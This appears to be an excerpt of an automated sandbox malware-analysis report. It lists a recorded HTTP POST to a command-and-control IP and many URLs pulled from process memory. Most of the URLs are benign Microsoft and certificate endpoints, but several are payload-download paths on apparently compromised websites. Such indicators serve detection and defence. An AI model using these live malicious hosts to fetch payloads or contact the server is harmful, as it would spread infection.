                Source: unknownHTTP traffic detected: POST /hzctvbal94fl2bqa/ HTTP/1.1DNT: 0Referer: 173.249.20.233/hzctvbal94fl2bqa/Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 173.249.20.233:443Content-Length: 8516Connection: Keep-AliveCache-Control: no-cache
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://apps.identruz
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: http://arquivopop.com.br/index_htm_files/Kxh/
                Source: svchost.exe, 0000000F.00000003.745654937.00000279643DA000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.dig
                Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                Source: powershell.exe, 00000004.00000002.700748377.000002712B6E5000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/D
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: http://gmpg.org/xfn/11
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: http://hotelshivansh.com/UserFiles/8/
                Source: powershell.exe, 00000004.00000002.697418447.00000271148FC000.00000004.00000001.sdmpString found in binary or memory: http://isatechnology.com
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                Source: svchost.exe, 0000000F.00000003.745654937.00000279643DA000.00000004.00000001.sdmpString found in binary or memory: http://oneocsp.mic
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: http://ownitconsignment.com/files/b/
                Source: powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000004.00000002.697362222.00000271148A3000.00000004.00000001.sdmpString found in binary or memory: http://physio-svdh.ch
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0-
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/03
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                Source: powershell.exe, 00000004.00000002.689707383.00000271135D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: http://transfersuvan.com/wp-admin/OVl/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                Source: powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
                Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
                Source: powershell.exe, 00000004.00000002.697418447.00000271148FC000.00000004.00000001.sdmpString found in binary or memory: http://www.isatechnology.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.aadrm.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.diagnostics.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.office.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.onedrive.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://apis.live.net/v5.0/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://augloop.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://augloop.office.com/v2
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/site/0H/
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://cairocad.com/cgi-bin/1PBB/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.entity.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                Source: svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749484580.00000279643DF000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cortana.ai/api
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cr.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev.cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://devnull.onenote.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://directory.services.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                Source: powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                Source: powershell.exe, 00000004.00000002.698282309.0000027114DD0000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000004.00000002.700973531.000002712B7C0000.00000004.00000001.sdmpString found in binary or memory: https://go.microsoft.co
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.ppe.windows.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.ppe.windows.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.windows.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.windows.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://layerslider.kreaturamedia.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://lifecycle.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.microsoftonline.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.local
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://management.azure.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://management.azure.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://messaging.office.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ncus-000.contentsync.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officeapps.live.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/beckenbodentherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/entspannungstherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/hausbesuche/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/lymphdrainage/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/med-trainingstherapie-mtt/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/physiotherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/schwindeltherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/training-fuer-senioren/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/comments/feed/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/feed/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/kontakt/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/offene-stellen/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/ueber-uns/about-us/
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-admin/kK/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/css/layerslider.css?ver=6.8
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedi
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.transitions.
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.css?v=7c
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.min.js?v
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cmsms-mega-menu//js/jquery.megaMenu.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.mi
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?
